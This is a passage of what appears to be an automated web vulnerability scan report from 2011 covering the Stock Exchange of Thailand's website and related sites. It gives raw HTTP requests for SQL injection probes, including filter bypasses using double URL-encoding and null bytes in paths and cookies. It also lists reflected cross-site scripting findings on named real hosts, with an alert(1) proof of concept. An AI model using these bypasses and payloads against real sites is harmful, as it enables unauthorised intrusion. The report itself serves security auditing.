User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/contact/contact.html
Cookie: verify=test; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 15:15:58 GMT
Server: Apache
Content-Length: 229
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /en/products/bonds/bonds_p1.html was not found on thi
...[SNIP]...

1.13. http://www.set.or.th/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /favicon.ico%2527 HTTP/1.1
Host: www.set.or.th
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=E578A525.1; _ctout23453=1; __utma=96623517.1603956337.1304462201.1304462201.1304462201.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304462201.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 17:43:47 GMT
Server: Apache
Last-Modified: Fri, 02 Oct 2009 08:51:20 GMT
ETag: "498e9e-33cf-de27d200"
Accept-Ranges: bytes
Content-Length: 13263
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's
Capital Market</title>
<META NAME="description" CONTENT="The Stock Exchange of Thailand, Your Investme
...[SNIP]...
<script language="javascript1.1"> page="Error 404";</script>
...[SNIP]...

Request 2

GET /favicon.ico%2527%2527 HTTP/1.1
Host: www.set.or.th
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=E578A525.1; _ctout23453=1; __utma=96623517.1603956337.1304462201.1304462201.1304462201.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304462201.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 17:43:50 GMT
Server: Apache
Content-Length: 215
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico%27%27 was not found on this server.</p>

...[SNIP]...

1.14. http://www.set.or.th/favicon.ico [_cbclose cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/favicon.ico

Issue detail

The _cbclose cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the _cbclose cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /favicon.ico HTTP/1.1
Host: www.set.or.th
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cbclose=1%00'; _cbclose23453=1; _uid23453=E578A525.1; _ctout23453=1; __utma=96623517.1603956337.1304462201.1304462201.1304462201.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304462201.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 17:37:59 GMT
Server: Apache
Last-Modified: Fri, 02 Oct 2009 08:51:20 GMT
ETag: "498e9e-33cf-de27d200"
Accept-Ranges: bytes
Content-Length: 13263
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's
Capital Market</title>
<META NAME="description" CONTENT="The Stock Exchange of Thailand, Your Investme
...[SNIP]...
<script language="javascript1.1"> page="Error 404";</script>
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
Host: www.set.or.th
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cbclose=1%00''; _cbclose23453=1; _uid23453=E578A525.1; _ctout23453=1; __utma=96623517.1603956337.1304462201.1304462201.1304462201.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304462201.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 17:38:02 GMT
Server: Apache
Content-Length: 209
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...

1.15. http://www.set.or.th/favicon.ico [_cbclose23453 cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/favicon.ico

Issue detail

The _cbclose23453 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the _cbclose23453 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /favicon.ico HTTP/1.1
Host: www.set.or.th
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cbclose=1; _cbclose23453=1%00'; _uid23453=E578A525.1; _ctout23453=1; __utma=96623517.1603956337.1304462201.1304462201.1304462201.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304462201.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 17:38:13 GMT
Server: Apache
Last-Modified: Fri, 02 Oct 2009 09:21:14 GMT
ETag: "cd18c-33cf-49161680"
Accept-Ranges: bytes
Content-Length: 13263
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's
Capital Market</title>
<META NAME="description" CONTENT="The Stock Exchange of Thailand, Your Investme
...[SNIP]...
<script language="javascript1.1"> page="Error 404";</script>
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
Host: www.set.or.th
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cbclose=1; _cbclose23453=1%00''; _uid23453=E578A525.1; _ctout23453=1; __utma=96623517.1603956337.1304462201.1304462201.1304462201.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304462201.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 17:38:16 GMT
Server: Apache
Content-Length: 209
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...

1.16. http://www.set.or.th/images/contact/map-banner-eng.swf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/images/contact/map-banner-eng.swf

Issue detail

Request 1

GET /images/contact'/map-banner-eng.swf HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/sitemap/for_listing.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:18:27 GMT
Server: Apache
Last-Modified: Fri, 02 Oct 2009 08:51:20 GMT
ETag: "498e9e-33cf-de27d200"
Accept-Ranges: bytes
Content-Length: 13263
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's
Capital Market</title>
<META NAME="description" CONTENT="The Stock Exchange of Thailand, Your Investme
...[SNIP]...
<script language="javascript1.1"> page="Error 404";</script>
...[SNIP]...

Request 2

GET /images/contact''/map-banner-eng.swf HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/sitemap/for_listing.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 15:18:29 GMT
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /images/contact''/map-banner-eng.swf was not found on
...[SNIP]...

1.17. http://www.set.or.th/set/newsdetails.do [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/set/newsdetails.do

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /set%00'/newsdetails.do;jsessionid=B784B24EBBBC521701E53D4C6FE368BF?type=R&time=1304399591000&filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111213110460E.txt&source=SET&headline=TFEX+News+%3A%28correction%29++TFEX+news+%3A+Thai+bourse+to+trades+silver+futures+on+June+20+and+to...&symbol=SET&language=en&country=US HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/highlight/release_en_US.html
Cookie: verify=test; JSESSIONID=A7D7E763B478E7E987ADE6B9FDAE7E3D; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:18:48 GMT
Server: Apache
Last-Modified: Fri, 02 Oct 2009 08:51:20 GMT
ETag: "498e9e-33cf-de27d200"
Accept-Ranges: bytes
Content-Length: 13263
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's
Capital Market</title>
<META NAME="description" CONTENT="The Stock Exchange of Thailand, Your Investme
...[SNIP]...
<script language="javascript1.1"> page="Error 404";</script>
...[SNIP]...

Request 2

GET /set%00''/newsdetails.do;jsessionid=B784B24EBBBC521701E53D4C6FE368BF?type=R&time=1304399591000&filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111213110460E.txt&source=SET&headline=TFEX+News+%3A%28correction%29++TFEX+news+%3A+Thai+bourse+to+trades+silver+futures+on+June+20+and+to...&symbol=SET&language=en&country=US HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/highlight/release_en_US.html
Cookie: verify=test; JSESSIONID=A7D7E763B478E7E987ADE6B9FDAE7E3D; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 15:18:50 GMT
Server: Apache
Content-Length: 201
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /set was not found on this server.</p>
</body></html>
...[SNIP]...

1.18. http://www.set.or.th/set/newslist.do [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/set/newslist.do

Issue detail

Request 1

GET /set'/newslist.do?language=en&country=US&to=&exchange=true&submit=Search&newsType=CASH_BALANCE&exchangeSymbols=&companyNews=on&from=&exchangeNews=on&company=true&symbol=&headline=to+be+traded+in+Cash+Balance HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: verify=test; JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 16:13:18 GMT
Server: Apache
Last-Modified: Fri, 02 Oct 2009 08:51:20 GMT
ETag: "498e9e-33cf-de27d200"
Accept-Ranges: bytes
Content-Length: 13263
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's
Capital Market</title>
<META NAME="description" CONTENT="The Stock Exchange of Thailand, Your Investme
...[SNIP]...
<script language="javascript1.1"> page="Error 404";</script>
...[SNIP]...

Request 2

GET /set''/newslist.do?language=en&country=US&to=&exchange=true&submit=Search&newsType=CASH_BALANCE&exchangeSymbols=&companyNews=on&from=&exchangeNews=on&company=true&symbol=&headline=to+be+traded+in+Cash+Balance HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: verify=test; JSESSIONID=A22EEA66F59FADF41DB11D19B3DE8B51; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 16:13:22 GMT
Server: Apache
Content-Length: 215
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /set''/newslist.do was not found on this server.</p>

...[SNIP]...

1.19. http://www.set.or.th/set/xcalendar.do [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/set/xcalendar.do

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /set/xcalendar.do%00'?language=en&country=US HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/xcalendar.do?language=en&country=US
Cookie: verify=test; JSESSIONID=54F91FCDB4DAE1F4AA35C30AFFB2AE74; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=7

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:34:22 GMT
Server: Apache
Last-Modified: Fri, 02 Oct 2009 08:51:20 GMT
ETag: "498e9e-33cf-de27d200"
Accept-Ranges: bytes
Content-Length: 13263
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's
Capital Market</title>
<META NAME="description" CONTENT="The Stock Exchange of Thailand, Your Investme
...[SNIP]...
<script language="javascript1.1"> page="Error 404";</script>
...[SNIP]...

Request 2

GET /set/xcalendar.do%00''?language=en&country=US HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/xcalendar.do?language=en&country=US
Cookie: verify=test; JSESSIONID=54F91FCDB4DAE1F4AA35C30AFFB2AE74; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=7

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 15:34:23 GMT
Server: Apache
Content-Length: 214
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /set/xcalendar.do was not found on this server.</p>
<
...[SNIP]...

1.20. http://www.set.or.th/setresearch/setresearch.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.set.or.th
Path:	/setresearch/setresearch.html

Issue detail

Request 1

GET /setresearch/setresearch.html' HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:18:03 GMT
Server: Apache
Last-Modified: Fri, 02 Oct 2009 09:21:14 GMT
ETag: "cd18c-33cf-49161680"
Accept-Ranges: bytes
Content-Length: 13263
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's
Capital Market</title>
<META NAME="description" CONTENT="The Stock Exchange of Thailand, Your Investme
...[SNIP]...
<script language="javascript1.1"> page="Error 404";</script>
...[SNIP]...

Request 2

GET /setresearch/setresearch.html'' HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 15:18:05 GMT
Server: Apache
Content-Length: 228
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /setresearch/setresearch.html'' was not found on this
...[SNIP]...

2. Cross-site scripting (reflected) previous next
There are 20 instances of this issue:

http://ds.addthis.com/red/psi/sites/marketdata.set.or.th/p.json [callback parameter]
http://ds.addthis.com/red/psi/sites/www.set.or.th/p.json [callback parameter]
http://marketdata.set.or.th/mkt/ftsequotation.do [country parameter]
http://marketdata.set.or.th/mkt/ftsequotation.do [language parameter]
http://marketdata.set.or.th/mkt/sectorquotation.do [country parameter]
http://marketdata.set.or.th/mkt/sectorquotation.do [language parameter]
http://widgets.digg.com/buttons/count [url parameter]
http://www.maysville-online.com/app/scripts/ajaxModules/'+upickemDeals[0][2]+' [REST URL parameter 1]
http://www.maysville-online.com/app/scripts/ajaxModules/'+upickemDeals[0][2]+' [REST URL parameter 1]
http://www.maysville-online.com/favicon.ico [REST URL parameter 1]
http://www.maysville-online.com/favicon.ico [REST URL parameter 1]
http://www.maysville-online.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.moneychannel.co.th/ [name of an arbitrarily supplied request parameter]
http://www.sec.or.th/view/truehitsstat.jsp [pagename parameter]
http://www.sec.or.th/view/view.jsp [lang parameter]
http://www.sec.or.th/view/view.jsp [lang parameter]
http://www.sec.or.th/view/view.jsp [lang parameter]
http://www.sec.or.th/view/view.jsp [name of an arbitrarily supplied request parameter]
http://www.set.or.th/set/newslist.do [name of an arbitrarily supplied request parameter]
http://www.thai-iod.com/en/index.asp [name of an arbitrarily supplied request parameter]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://ds.addthis.com/red/psi/sites/marketdata.set.or.th/p.json [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/marketdata.set.or.th/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a2176<script>alert(1)</script>9e9fd4c751b was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

